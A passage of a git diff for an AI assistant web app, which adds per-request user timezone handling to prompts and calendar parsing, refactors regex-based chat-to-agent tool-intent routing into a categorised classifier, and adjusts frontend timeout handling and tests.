         """Return (hour, minute) from '1pm', '1:30 PM', '13:00', etc., or None."""
+        t = _re.sub(r'\b([ap])\s*\.?\s*m\.?\b', r'\1m', t.strip(), flags=_re.IGNORECASE)
         m = _re.match(r'^\s*(\d{1,2})(?::(\d{2}))?\s*(am|pm)?\s*$', t, _re.IGNORECASE)
         if not m:
             return None
@@ -1210,7 +1205,20 @@ def setup_calendar_routes() -> APIRouter:
         text = (body.get("text") or "").strip()
         if not text:
             raise HTTPException(400, "text is required")
+        from src.user_time import (
+            clear_user_time_context,
+            current_datetime_prompt,
+            now_user_local,
+            set_user_tz_name,
+            set_user_tz_offset,
+        )
+
+        clear_user_time_context()
         tz_hint = (body.get("tz") or "").strip()
+        if body.get("tz_offset") is not None:
+            set_user_tz_offset(body.get("tz_offset"))
+        if tz_hint:
+            set_user_tz_name(tz_hint)
 
         url, model, headers = resolve_endpoint("utility")
         if not url:
@@ -1218,15 +1226,15 @@ def setup_calendar_routes() -> APIRouter:
         if not url or not model:
             return {"ok": False, "error": "No LLM endpoint configured"}
 
-        now = datetime.now()
+        now = now_user_local()
         now_iso = now.strftime("%Y-%m-%dT%H:%M:%S")
         # The model gets only the schema it needs to fill out; we re-validate
         # everything client-side too.
         system_prompt = (
-            "You are a calendar event parser. Read the user's one-line "
+            current_datetime_prompt()
+            + "You are a calendar event parser. Read the user's one-line "
             "description and emit STRICT JSON describing the event. "
-            f"Today is {now.strftime('%A, %Y-%m-%d')} ({now_iso}). "
-            + (f"User timezone: {tz_hint}. " if tz_hint else "")
+            f"The current user-local timestamp is {now_iso}. "
             + "Resolve relative dates (\"tomorrow\", \"friday\", \"next monday\", "
               "\"in 30 minutes\") against today. Default duration is 60 minutes "
               "when no end time is given. If the text mentions a date with no "
diff --git a/routes/chat_routes.py b/routes/chat_routes.py
index f54c265..8dd17a5 100644
--- a/routes/chat_routes.py
+++ b/routes/chat_routes.py
@@ -37,7 +37,7 @@ from routes.chat_helpers import (
     clean_thinking_for_save,
     _enforce_chat_privileges,
 )
-from src.action_intents import message_needs_tools as _message_needs_tools
+from src.action_intents import classify_tool_intent as _classify_tool_intent
 
 logger = logging.getLogger(__name__)
 
@@ -229,6 +229,26 @@ def _recover_empty_session_model(sess, session_id: str, owner: str | None = None
         db.close()
 
 
+def _set_user_time_from_request(request: Request) -> None:
+    """Copy browser timezone headers into the per-request context.
+
+    This is intentionally ephemeral: it is used only while building prompts
+    and running tools for this request. It is not persisted or logged.
+    """
+    try:
+        tz_offset = request.headers.get("x-tz-offset")
+        tz_name = request.headers.get("x-tz-name")
+        from src.user_time import clear_user_time_context, set_user_tz_name, set_user_tz_offset
+
+        clear_user_time_context()
+        if tz_offset is not None:
+            set_user_tz_offset(tz_offset)
+        if tz_name:
+            set_user_tz_name(tz_name)
+    except Exception:
+        pass
+
+
 def setup_chat_routes(
     session_manager,
     chat_handler,
@@ -247,6 +267,8 @@ def setup_chat_routes(
     # ------------------------------------------------------------------ #
     @router.post("/api/chat", response_model=Dict[str, str])
     async def chat_endpoint(request: Request, chat_request: ChatRequest) -> Dict[str, str]:
+        _set_user_time_from_request(request)
+
         message = chat_request.message
         session = chat_request.session
         att_ids = chat_request.attachments or []
@@ -355,16 +377,7 @@ def setup_chat_routes(
         except Exception as e:
             raise HTTPException(400, f"Request parsing error: {e}")
 
-        # Stash the user's UTC offset (in minutes east of UTC) from the
-        # frontend so tools like manage_notes interpret natural-language
-        # times in the USER's tz, not the server's. See calendar_routes.
-        try:
-            _tz_hdr = request.headers.get("x-tz-offset")
-            if _tz_hdr is not None:
-                from routes.calendar_routes import set_user_tz_offset
-                set_user_tz_offset(_tz_hdr)
-        except Exception:
-            pass
+        _set_user_time_from_request(request)
 
         form_data = await request.form()
         message = form_data.get("message")
@@ -393,10 +406,15 @@ def setup_chat_routes(
         # its way through a plain chat request (and fail, especially with the
         # shell disabled).
         auto_escalated = False
-        if chat_mode == "chat" and isinstance(message, str) and _message_needs_tools(message):
+        _tool_intent = _classify_tool_intent(message) if isinstance(message, str) else None
+        if chat_mode == "chat" and _tool_intent and _tool_intent.needs_tools:
             chat_mode = "agent"
             auto_escalated = True
-            logger.info("chat→agent auto-escalation: message matched tool-intent pattern")
+            logger.info(
+                "chat→agent auto-escalation: category=%s reason=%s",
+                _tool_intent.category,
+                _tool_intent.reason,
+            )
         active_doc_id = form_data.get("active_doc_id", "").strip()
         logger.info(f"[doc-inject] chat_mode={chat_mode}, active_doc_id={active_doc_id!r}")
 
diff --git a/src/action_intents.py b/src/action_intents.py
index 7054801..84734ab 100644
--- a/src/action_intents.py
+++ b/src/action_intents.py
@@ -8,74 +8,121 @@ user asks how a feature works.
 from __future__ import annotations
 
 import re
+from dataclasses import dataclass
 from typing import Iterable, Pattern
 
 
-_ACTION_QUESTION = r"\b(?:can|could|would|will)\s+you\s+"
-_PLEASE = r"^\s*(?:please\s+)?"
+@dataclass(frozen=True)
+class ToolIntent:
+    """A cheap, deterministic chat-to-agent routing decision."""
 
-_CALENDAR_ACTION = r"(?:add|create|schedule|book|put|set\s+up|make)"
+    needs_tools: bool
+    category: str = ""
+    reason: str = ""
+
+
+_ACTION_QUESTION = r"\b(?:can|could|would|will)\s+you\s+"
+_ACTION_FOLLOWUP = (
+    r"\b(?:you\s+should\s+be\s+able\s+to|"
+    r"(?:can|could|would|will|should)\s+you|"
+    r"you\s+(?:can|could|would|will|should|need\s+to|have\s+to))\s+"
+)
+_PLEASE = r"^\s*(?:(?:please|ok(?:ay)?|alright|right|sure|cool|great|thanks)[\s,.!-]+)*"
+
+_CALENDAR_ACTION = (
+    r"(?:add|adding|create|creating|recreate|recreating|schedule|scheduling|"
+    r"reschedule|rescheduling|book|booking|put|set\s+up|make|making|"
+    r"delete|deleting|remove|removing|cancel|cancelling|canceling)"
+)
 _CALENDAR_THING = r"(?:calendar|calendar\s+(?:entry|item)|event|meeting|appointment|entry|call)"
+_EXPLANATORY_PREFIX = re.compile(
+    r"^\s*(?:how\s+(?:do|can)\s+i|can\s+you\s+explain|what\s+about|tell\s+me\s+how|show\s+me\s+how)\b",
+    re.I,
+)
 
 _PANEL = (
     r"(?:calendar|notes?|inbox|email|mail|documents?|docs|library|gallery|"
     r"settings|cookbook|sessions?|chats?|skills|memories|memory|brain)"
 )
 
-_TOOL_INTENT_PATTERNS: tuple[Pattern[str], ...] = tuple(
-    re.compile(pattern, re.I)
-    for pattern in (
+_ROUTING_PATTERNS: tuple[tuple[str, str, Pattern[str]], ...] = tuple(
+    (category, reason, re.compile(pattern, re.I))
+    for category, reason, pattern in (
         # Calendar/event creation. Covers "Can you add an entry to my
-        # calendar?" and imperatives like "add lunch to my calendar".
-        rf"{_ACTION_QUESTION}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b",
-        rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b",
-        rf"{_PLEASE}{_CALENDAR_ACTION}\s+(?:a\s+|an\s+)?(?:calendar\s+)?(?:event|meeting|appointment|entry|item|call)\b",
-        r"\bput\s+.+\bon\s+(?:my\s+)?calendar\b",
+        # calendar?", imperatives like "add lunch to my calendar", and
+        # follow-ups such as "you should be able to create that event now".
+        ("calendar", "assistant calendar action request", rf"{_ACTION_QUESTION}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar follow-up action request", rf"{_ACTION_FOLLOWUP}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar imperative action request", rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar target action request", rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b"),
+        ("calendar", "calendar item action request", rf"{_PLEASE}{_CALENDAR_ACTION}\s+(?:it\s+)?(?:a\s+|an\s+)?(?:calendar\s+)?(?:event|meeting|appointment|entry|item|call)\b"),
+        ("calendar", "calendar target action request", rf"\b{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b"),
+        ("calendar", "put item on calendar request", r"\bput\s+.+\bon\s+(?:my\s+)?calendar\b"),
 
         # Notes, todos, checklists, and reminders.
-        r"\bremind\s+me\b",
-        rf"{_ACTION_QUESTION}(?:add|create|make|take|jot|write\s+down|set)\b.{{0,120}}\b(?:note|todo|task|checklist|reminder)\b",
-        rf"{_PLEASE}(?:add|create|make)\s+(?:a\s+|an\s+)?(?:todo|task|reminder|note|checklist)\b",
-        rf"{_PLEASE}(?:take|jot|write\s+down)\s+(?:a\s+|an\s+)?note\b",
-        rf"{_PLEASE}(?:add|jot|write\s+down)\b.{{0,120}}\b(?:to|in|into)\s+(?:my\s+|the\s+)?(?:todo(?:\s+list)?|task\s+list|notes?|checklist)\b",
-        rf"{_PLEASE}set\s+(?:a\s+)?reminder\b",
-        rf"{_ACTION_QUESTION}set\s+(?:a\s+)?reminder\b",
+        ("notes", "reminder request", r"\bremind\s+me\b"),
+        ("notes", "assistant note/todo action request", rf"{_ACTION_QUESTION}(?:add|create|make|take|jot|write\s+down|set)\b.{{0,120}}\b(?:note|todo|task|checklist|reminder)\b"),
+        ("notes", "note/todo imperative request", rf"{_PLEASE}(?:add|create|make)\s+(?:a\s+|an\s+)?(?:todo|task|reminder|note|checklist)\b"),
+        ("notes", "take note request", rf"{_PLEASE}(?:take|jot|write\s+down)\s+(?:a\s+|an\s+)?note\b"),
+        ("notes", "add item to notes/todo request", rf"{_PLEASE}(?:add|jot|write\s+down)\b.{{0,120}}\b(?:to|in|into)\s+(?:my\s+|the\s+)?(?:todo(?:\s+list)?|task\s+list|notes?|checklist)\b"),
+        ("notes", "set reminder request", rf"{_PLEASE}set\s+(?:a\s+)?reminder\b"),
+        ("notes", "assistant reminder request", rf"{_ACTION_QUESTION}set\s+(?:a\s+)?reminder\b"),
 
         # Email actions.
-        rf"{_ACTION_QUESTION}(?:send|write|reply|email|message|archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox|unread|read)\b",
-        rf"{_PLEASE}(?:send|write|reply)\b.{{0,120}}\b(?:emails?|mail|messages?)\b",
-        rf"{_PLEASE}(?:archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox)\b",
-        r"\b(?:send|write|reply)\s+(?:an?\s+)?(?:email|message|mail)\b",
-        r"\bemail\s+\w+\b",
-        r"\bcheck\s+(?:my\s+)?(?:email|inbox|mail)\b",
-        r"\bunread\s+(?:email|mail)s?\b",
+        ("email", "assistant email action request", rf"{_ACTION_QUESTION}(?:send|write|reply|email|message|archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox|unread|read)\b"),
+        ("email", "send/write/reply email request", rf"{_PLEASE}(?:send|write|reply)\b.{{0,120}}\b(?:emails?|mail|messages?)\b"),
+        ("email", "archive/delete/mark email request", rf"{_PLEASE}(?:archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox)\b"),
+        ("email", "email composition request", r"\b(?:send|write|reply)\s+(?:an?\s+)?(?:email|message|mail)\b"),
+        ("email", "email contact request", r"\bemail\s+\w+\b"),
+        ("email", "check inbox request", r"\bcheck\s+(?:my\s+)?(?:email|inbox|mail)\b"),
+        ("email", "unread email request", r"\bunread\s+(?:email|mail)s?\b"),
 
         # UI/control-plane actions that should open panels or flip toggles.
-        rf"{_PLEASE}(?:open|show|bring\s+up)\s+(?:me\s+)?(?:my\s+|the\s+)?{_PANEL}\b",
-        r"\b(?:disable|enable|turn\s+(?:on|off))\s+(?:the\s+)?(?:shell|search|web|browser|documents?|memory|skills|images?|calendar|email|mail|research|incognito)\b",
+        ("ui", "open/show panel request", rf"{_PLEASE}(?:open|show|bring\s+up)\s+(?:me\s+)?(?:my\s+|the\s+)?{_PANEL}\b"),
+        ("ui", "tool or feature toggle request", r"\b(?:disable|enable|turn\s+(?:on|off))\s+(?:the\s+)?(?:shell|search|web|browser|documents?|memory|skills|images?|calendar|email|mail|research|incognito)\b"),
 
         # Deep research jobs, not quick conceptual mentions of research.
-        rf"{_PLEASE}(?:research|deep\s+dive|look\s+into|investigate)\s+.+",
-        rf"{_ACTION_QUESTION}(?:research|do\s+research|deep\s+dive|look\s+into|investigate)\s+.+",
+        ("research", "deep research imperative request", rf"{_PLEASE}(?:research|deep\s+dive|look\s+into|investigate)\s+.+"),
+        ("research", "assistant deep research request", rf"{_ACTION_QUESTION}(?:research|do\s+research|deep\s+dive|look\s+into|investigate)\s+.+"),
 
         # Shell / remote-host intent.
-        r"\bssh\s+(?:in)?to\b",
-        r"\bssh\s+\w+",
-        r"\b(run|execute)\s+.{1,40}\bon\s+\w+",
-        r"\b(can|could|please|would)\s+you\s+(run|execute|exec)\b",
+        ("shell", "ssh request", r"\bssh\s+(?:in)?to\b"),
+        ("shell", "ssh target request", r"\bssh\s+\w+"),
+        ("shell", "remote command request", r"\b(run|execute)\s+.{1,40}\bon\s+\w+"),
+        ("shell", "assistant command execution request", r"\b(can|could|please|would)\s+you\s+(run|execute|exec)\b"),
         # Shell verbs only count in imperative position (start of message,
         # optionally after "please") or as a "can you ..." request. A bare
         # word match promoted informational questions ("What does the grep
         # command do?") and incidental uses ("My cat ate my homework").
-        rf"{_PLEASE}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+",
-        rf"{_ACTION_QUESTION}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+",
-        r"\b(check|see)\s+(if|whether|what)\s+.{1,40}\b(running|process|service|port|file|exists?)\b",
+        ("shell", "imperative shell command request", rf"{_PLEASE}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+"),
+        ("shell", "assistant shell command request", rf"{_ACTION_QUESTION}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+"),
+        ("shell", "system/file check request", r"\b(check|see)\s+(if|whether|what)\s+.{1,40}\b(running|process|service|port|file|exists?)\b"),
     )
 )
 
+_TOOL_INTENT_PATTERNS: tuple[Pattern[str], ...] = tuple(
+    pattern for _, _, pattern in _ROUTING_PATTERNS
+)
+
+
+def classify_tool_intent(text: str) -> ToolIntent:
+    """Classify whether a chat message should be promoted to agent mode."""
+    if not text:
+        return ToolIntent(False, reason="empty message")
+    if _EXPLANATORY_PREFIX.search(text):
+        return ToolIntent(False, reason="explanatory feature question")
+    for category, reason, pattern in _ROUTING_PATTERNS:
+        if pattern.search(text):
+            return ToolIntent(True, category=category, reason=reason)
+    return ToolIntent(False, reason="no tool-action pattern matched")
+
 
 def message_needs_tools(text: str, patterns: Iterable[Pattern[str]] = _TOOL_INTENT_PATTERNS) -> bool:
     """Return True when a plain chat message should be promoted to agent mode."""
     if not text:
         return False
+    if _EXPLANATORY_PREFIX.search(text):
+        return False
+    if patterns is _TOOL_INTENT_PATTERNS:
+        return classify_tool_intent(text).needs_tools
     return any(pattern.search(text) for pattern in patterns)
diff --git a/src/agent_loop.py b/src/agent_loop.py
index c0a7cc6..653baa9 100644
--- a/src/agent_loop.py
+++ b/src/agent_loop.py
@@ -636,28 +636,11 @@ def _build_system_prompt(
 
     set_active_model(model)
 
-    # Current date/time — every request. Models default to their
-    # training-cutoff date when "today" is asked otherwise (was
-    # rendering April 2026 dates as "today" when the actual date is
-    # May 19, 2026). System TZ-local so calendar/email date math
-    # matches what the user sees.
+    # Current date/time for every agent request. This is user-local when the
+    # browser provided timezone headers, with a server-local fallback.
     try:
-        from datetime import datetime as _dt, timezone as _tz
-        _now = _dt.now().astimezone()
-        _utc = _dt.now(_tz.utc)
-        _off = _now.strftime('%z')  # e.g. +0900
-        _off_fmt = (f"{_off[:3]}:{_off[3:]}" if _off else "+00:00")
-        agent_prompt = (
-            f"## Current date and time\n"
-            f"Today is {_now.strftime('%A, %B %-d, %Y')} ({_now.strftime('%Y-%m-%d')}). "
-            f"Local time is {_now.strftime('%-I:%M %p')} ({_now.strftime('%Z')}, UTC{_off_fmt}); "
-            f"current UTC time is {_utc.strftime('%H:%M')}. "
-            f"Use this for any 'today'/'tomorrow'/'this week' reasoning — do NOT "
-            f"infer the date from training data or from event timestamps.\n"
-            f"When scheduling a task (manage_tasks), scheduled_time is in UTC: "
-            f"subtract the offset above from the user's local time "
-            f"(local {_now.strftime('%H:%M')} = {_utc.strftime('%H:%M')} UTC right now).\n\n"
-        ) + agent_prompt
+        from src.user_time import current_datetime_prompt
+        agent_prompt = current_datetime_prompt() + agent_prompt
     except Exception:
         pass
 
diff --git a/src/chat_processor.py b/src/chat_processor.py
index 47ff76c..02062ae 100644
--- a/src/chat_processor.py
+++ b/src/chat_processor.py
@@ -185,6 +185,15 @@ class ChatProcessor:
                 "role": "system",
                 "content": preset_system_prompt
             })
+        if not agent_mode:
+            try:
+                from src.user_time import current_datetime_prompt
+                preface.append({
+                    "role": "system",
+                    "content": current_datetime_prompt(),
+                })
+            except Exception:
+                logger.debug("Failed to add current date/time context", exc_info=True)
         preface.append({
             "role": "system",
             "content": UNTRUSTED_CONTEXT_POLICY,
diff --git a/src/tool_index.py b/src/tool_index.py
index 506e55d..3c5150e 100644
--- a/src/tool_index.py
+++ b/src/tool_index.py
@@ -102,7 +102,7 @@ BUILTIN_TOOL_DESCRIPTIONS: Dict[str, str] = {
     "resolve_contact": "Look up a contact's email address by name. Searches CardDAV address book and sent email history. Use when the user says 'message [name]', 'email [name]', or 'send to [name]' without an email address.",
     "manage_contact": "Create, update, delete, or list CardDAV contacts. Use to save a new contact, change an existing one's email/phone, or remove one. Action=list returns uids needed for update/delete. Use when the user says 'save this contact', 'add [name] to contacts', 'update [name]'s email', 'delete [name] from contacts'. Do not use for user identity facts like 'my name is <name>'; those are memory.",
     "manage_notes": "Create and manage notes and checklists (Google Keep-style). ALWAYS use this for note/todo/checklist/reminder creation — NEVER hit /api/notes via app_api. Accepts natural-language `due_date` like 'tomorrow at 9am' or '11pm today' (parsed in the USER'S timezone). The due_date IS the reminder — it fires a notification at that time, so do NOT also create a calendar event for the same reminder. Set colors, labels, pin, archive. Do NOT use manage_memory for note content.",
-    "manage_calendar": "Calendar event management: list, create, update, delete. Each event can carry a tag/category (event_type — work/personal/health/travel/meal/social/admin/other) and importance (low/normal/high/critical). Use ISO datetimes; supports all-day events. For event reminders/alarms, pass reminder_minutes; this creates the Notes reminder, so do not also call manage_notes for the same reminder.",
+    "manage_calendar": "Calendar event management: list, create, update, delete. Each event can carry a tag/category (event_type — work/personal/health/travel/meal/social/admin/other) and importance (low/normal/high/critical). Resolve today/tomorrow using the Current date and time context, then use ISO datetimes in the user's local wall time; supports all-day events. For event reminders/alarms, pass reminder_minutes; this creates the Notes reminder, so do not also call manage_notes for the same reminder.",
     "download_model": "Download a HuggingFace model to a local or remote server. Specify repo_id (e.g. 'Qwen/Qwen3-8B'), optional server host, and optional include filter for specific files.",
     "serve_model": "Start serving a model with vLLM, SGLang, llama.cpp, Ollama, or Diffusers. For image/inpainting/diffusion use python3 scripts/diffusion_server.py --model <repo> --port 8100. After launch, call list_served_models for readiness/errors and retry suggestions.",
     "list_served_models": "List currently running model servers in the Cookbook — shows status (loading, ready, idle, error), model name, port, throughput, and serve failure diagnosis/retry suggestions. Use when the user asks 'what's running', 'show my cookbook', 'which models are up', 'what's serving'.",
diff --git a/src/tool_schemas.py b/src/tool_schemas.py
index f55fb82..b862301 100644
--- a/src/tool_schemas.py
+++ b/src/tool_schemas.py
@@ -422,7 +422,7 @@ FUNCTION_TOOL_SCHEMAS = [
         "type": "function",
         "function": {
             "name": "manage_calendar",
-            "description": "Manage calendar events: list events in a date range, create, update, delete. Each event can carry a tag/category (event_type) and importance level. Use ISO 8601 datetimes; for all-day events set all_day=true and pass YYYY-MM-DD. For event reminders/alarms, pass reminder_minutes; the tool creates the Odysseus note reminder, so do not also call manage_notes for the same reminder.",
+            "description": "Manage calendar events: list events in a date range, create, update, delete. Each event can carry a tag/category (event_type) and importance level. Resolve relative dates like today/tomorrow against the 'Current date and time' system context, then pass ISO 8601 datetimes in the user's local wall time; for all-day events set all_day=true and pass YYYY-MM-DD. For event reminders/alarms, pass reminder_minutes; the tool creates the Odysseus note reminder, so do not also call manage_notes for the same reminder.",
             "parameters": {
                 "type": "object",
                 "properties": {
diff --git a/src/user_time.py b/src/user_time.py
new file mode 100644
index 0000000..44519c0
--- /dev/null
+++ b/src/user_time.py
@@ -0,0 +1,138 @@
+"""Per-request user-local time helpers.
+
+Chat routes set this context from browser headers. Prompt builders and tools
+can then resolve relative dates against the user's clock instead of the server.
+"""
+
+from __future__ import annotations
+
+import re
+from contextvars import ContextVar
+from datetime import datetime, timedelta, timezone
+from typing import Optional
+
+
+_USER_TZ_OFFSET_MIN: ContextVar[Optional[int]] = ContextVar("user_tz_offset_min", default=None)
+_USER_TZ_NAME: ContextVar[Optional[str]] = ContextVar("user_tz_name", default=None)
+
+
+def set_user_tz_offset(offset_min) -> None:
+    """Set the current user's UTC offset in minutes east of UTC."""
+    if offset_min in (None, ""):
+        _USER_TZ_OFFSET_MIN.set(None)
+        return
+    try:
+        value = int(offset_min)
+    except (TypeError, ValueError):
+        return
+    if -14 * 60 <= value <= 14 * 60:
+        _USER_TZ_OFFSET_MIN.set(value)
+
+
+def get_user_tz_offset() -> Optional[int]:
+    """Return minutes east of UTC for the current user, if known."""
+    return _USER_TZ_OFFSET_MIN.get()
+
+
+def set_user_tz_name(name) -> None:
+    """Set a safe IANA timezone label for the current request context."""
+    if not name:
+        _USER_TZ_NAME.set(None)
+        return
+    first_token = str(name).strip().split()[0] if str(name).strip() else ""
+    cleaned = re.sub(r"[^A-Za-z0-9_+\-./]", "", first_token)[:80]
+    _USER_TZ_NAME.set(cleaned or None)
+
+
+def get_user_tz_name() -> Optional[str]:
+    """Return the current user's browser timezone name, if provided."""
+    return _USER_TZ_NAME.get()
+
+
+def clear_user_time_context() -> None:
+    """Clear user-local time context for tests and non-browser entry points."""
+    _USER_TZ_OFFSET_MIN.set(None)
+    _USER_TZ_NAME.set(None)
+
+
+def format_utc_offset(offset_min: Optional[int]) -> str:
+    """Format minutes east of UTC as +HH:MM or -HH:MM."""
+    if offset_min is None:
+        offset_min = 0
+    sign = "+" if offset_min >= 0 else "-"
+    total = abs(int(offset_min))
+    hours, minutes = divmod(total, 60)
+    return f"{sign}{hours:02d}:{minutes:02d}"
+
+
+def user_timezone() -> timezone:
+    """Return the best known user timezone as a fixed-offset tzinfo."""
+    offset = get_user_tz_offset()
+    if offset is None:
+        name = get_user_tz_name()
+        if name:
+            try:
+                from zoneinfo import ZoneInfo
+                return ZoneInfo(name)
+            except Exception:
+                pass
+        return datetime.now().astimezone().tzinfo or timezone.utc
+    return timezone(timedelta(minutes=offset))
+
+
+def now_user_local(now_utc: Optional[datetime] = None) -> datetime:
+    """Return the current time in the user's timezone."""
+    if now_utc is None:
+        now_utc = datetime.now(timezone.utc)
+    elif now_utc.tzinfo is None:
+        now_utc = now_utc.replace(tzinfo=timezone.utc)
+    return now_utc.astimezone(user_timezone())
+
+
+def _date_label(dt: datetime) -> str:
+    return f"{dt.strftime('%A')}, {dt.strftime('%B')} {dt.day}, {dt.year}"
+
+
+def _clock_label(dt: datetime) -> str:
+    hour = dt.hour % 12 or 12
+    return f"{hour}:{dt.minute:02d} {dt.strftime('%p')}"
+
+
+def timezone_label(dt: Optional[datetime] = None) -> str:
+    """Return a concise display label such as Australia/Brisbane, UTC+10:00."""
+    offset = get_user_tz_offset()
+    if offset is None:
+        if dt is None:
+            dt = datetime.now().astimezone()
+        offset = int((dt.utcoffset() or timedelta()).total_seconds() // 60)
+    offset_label = f"UTC{format_utc_offset(offset)}"
+    name = get_user_tz_name()
+    return f"{name}, {offset_label}" if name else offset_label
+
+
+def current_datetime_prompt(now_utc: Optional[datetime] = None) -> str:
+    """Build reusable system prompt text for date/time reasoning."""
+    if now_utc is None:
+        utc_now = datetime.now(timezone.utc)
+    elif now_utc.tzinfo is None:
+        utc_now = now_utc.replace(tzinfo=timezone.utc)
+    else:
+        utc_now = now_utc.astimezone(timezone.utc)
+
+    local_now = now_user_local(utc_now)
+    tomorrow = local_now + timedelta(days=1)
+    return (
+        "## Current date and time\n"
+        f"Today is {_date_label(local_now)} ({local_now.strftime('%Y-%m-%d')}). "
+        f"User local time is {_clock_label(local_now)} ({timezone_label(local_now)}); "
+        f"current UTC time is {utc_now.strftime('%H:%M')}.\n"
+        f"Tomorrow is {_date_label(tomorrow)} ({tomorrow.strftime('%Y-%m-%d')}) "
+        "in the user's local timezone.\n"
+        "Use this for any 'today', 'tomorrow', 'tonight', 'this week', or other "
+        "relative-date reasoning. Do not ask for an exact date just because the "
+        "user used a relative date.\n"
+        "When scheduling calendar events with manage_calendar, pass local ISO "
+        "datetimes resolved against this user-local date/time.\n"
+        "When scheduling a task with manage_tasks, scheduled_time is in UTC: "
+        "convert the user's stated local time using the UTC offset above.\n\n"
+    )
diff --git a/static/js/calendar.js b/static/js/calendar.js
index 31a4423..ebd6bfc 100644
--- a/static/js/calendar.js
+++ b/static/js/calendar.js
@@ -1876,11 +1876,12 @@ function _wireAll(body) {
       }
       try {
         const tz = Intl.DateTimeFormat().resolvedOptions().timeZone || '';
+        const tzOffset = -new Date().getTimezoneOffset();
         const res = await fetch(`${API_BASE}/api/calendar/quick-parse`, {
           method: 'POST',
           credentials: 'same-origin',
           headers: { 'Content-Type': 'application/json' },
-          body: JSON.stringify({ text, tz }),
+          body: JSON.stringify({ text, tz, tz_offset: tzOffset }),
         });
         const data = await res.json().catch(() => ({}));
         if (!res.ok || !data.ok) {
diff --git a/static/js/chat.js b/static/js/chat.js
index f14c715..dd47188 100644
--- a/static/js/chat.js
+++ b/static/js/chat.js
@@ -530,6 +530,9 @@ import createResearchSynapse from './researchSynapse.js';
     let _renderStream = () => {};
     let _cancelThinkingTimer = () => {};
     let _removeThinkingSpinner = () => {};
+    let timeoutId = null;
+    let responseTimeoutCleared = false;
+    let clearResponseTimeout = () => {};
     const clearProcessingProbe = () => {
       if (processingProbeTimer) {
         clearTimeout(processingProbeTimer);
@@ -790,13 +793,26 @@ import createResearchSynapse from './researchSynapse.js';
 
       // Timeout: 6 min for research and agent mode, 3 min otherwise
       const timeoutMs = el('research-toggle').checked || _isAgent ? RESEARCH_TIMEOUT_MS : DEFAULT_TIMEOUT_MS;
-      const timeoutId = setTimeout(() => {
+      timeoutId = setTimeout(() => {
         if (!abortCtrl.signal.aborted) {
           timedOut = true;
           abortCtrl._reason = 'timeout';
+          try {
+            if (streamSessionId) {
+              fetch(`/api/chat/stop/${encodeURIComponent(streamSessionId)}`, {
+                method: 'POST',
+                credentials: 'same-origin',
+              }).catch(() => {});
+            }
+          } catch (_) {}
           abortCtrl.abort();
         }
       }, timeoutMs);
+      clearResponseTimeout = () => {
+        if (responseTimeoutCleared) return;
+        responseTimeoutCleared = true;
+        clearTimeout(timeoutId);
+      };
       
       const box = el('chat-history');
       holder = document.createElement('div');
@@ -922,16 +938,19 @@ import createResearchSynapse from './researchSynapse.js';
       // the agent so natural-language times like "today at 9pm" are
       // interpreted in YOUR timezone, not the server's.
       const _tzOffsetMin = -new Date().getTimezoneOffset();
+      const _tzName = (() => {
+        try { return Intl.DateTimeFormat().resolvedOptions().timeZone || ''; }
+        catch { return ''; }
+      })();
       const res = await fetch(`${API_BASE}/api/chat_stream`, {
         method: 'POST',
         body: fd,
-        headers: { 'X-Tz-Offset': String(_tzOffsetMin) },
+        headers: { 'X-Tz-Offset': String(_tzOffsetMin), 'X-Tz-Name': _tzName },
         signal: abortCtrl.signal
       });
       
-      clearTimeout(timeoutId);
-      
       if (!res.ok) {
+        clearResponseTimeout();
         if (res.status === 404) {
           // Session was deleted (e.g. by AI) — reload and go to welcome
           holder.remove();
@@ -1359,7 +1378,8 @@ import createResearchSynapse from './researchSynapse.js';
                 typewriterInto(roundHolder.querySelector('.body'), errMsg);
                 break;
               }
-              if (json.delta || json.type === 'tool_start' || json.type === 'agent_step' || json.type === 'doc_stream_delta') {
+              if (json.delta || json.type === 'tool_start' || json.type === 'tool_output' || json.type === 'tool_progress' || json.type === 'agent_step' || json.type === 'doc_stream_open' || json.type === 'doc_stream_delta' || json.type === 'research_progress') {
+                clearResponseTimeout();
                 clearProcessingProbe();
               }
               if (json.delta) {
@@ -2710,6 +2730,7 @@ import createResearchSynapse from './researchSynapse.js';
         }
       }
     } finally {
+      clearResponseTimeout();
       clearProcessingProbe();
       // Streaming done — let screen readers announce the settled response.
       const _chatLogDone = document.getElementById('chat-history');
diff --git a/tests/test_action_intents.py b/tests/test_action_intents.py
index 87f59fa..164ed4d 100644
--- a/tests/test_action_intents.py
+++ b/tests/test_action_intents.py
@@ -1,14 +1,26 @@
-from src.action_intents import message_needs_tools
+from src.action_intents import classify_tool_intent, message_needs_tools
 
 
 def test_calendar_entry_request_promotes_to_agent():
     assert message_needs_tools("Can you add an entry to my calendar?")
+    intent = classify_tool_intent("Can you add an entry to my calendar?")
+    assert intent.needs_tools
+    assert intent.category == "calendar"
 
 
 def test_calendar_imperative_variants_promote_to_agent():
     assert message_needs_tools("add lunch with Sam to my calendar tomorrow at noon")
     assert message_needs_tools("schedule a call with Mina next Friday")
     assert message_needs_tools("put dentist appointment on my calendar")
+    assert message_needs_tools("Alright. Recreate that same appointment")
+    assert message_needs_tools("Okay delete that doctor appointment from the calendar")
